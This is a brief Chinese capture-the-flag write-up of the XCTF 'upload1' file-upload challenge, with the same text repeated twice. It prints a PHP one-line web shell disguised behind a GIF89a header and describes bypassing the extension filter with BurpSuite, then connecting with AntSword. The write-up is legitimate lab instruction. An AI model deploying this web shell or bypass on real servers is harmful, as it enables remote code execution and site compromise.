攻防世界之upload1
题目
文件上传漏洞,所以上传一句话木马…
GIF89a?
<script language="php">eval($_POST['zyh']);</script>
一开始是直接上传php文件,但是发现它会被拦下
没关系,那就先改成文件后缀名,然后用BurpSuite抓包!
然后再用BurpSuite改一下后缀名就可以了(改成php文件)
最后再用蚁剑链接就可以得到Flag了
题目
文件上传漏洞,所以上传一句话木马…
GIF89a?
<script language="php">eval($_POST['zyh']);</script>
一开始是直接上传php文件,但是发现它会被拦下
没关系,那就先改成文件后缀名,然后用BurpSuite抓包!
然后再用BurpSuite改一下后缀名就可以了(改成php文件)
最后再用蚁剑链接就可以得到Flag了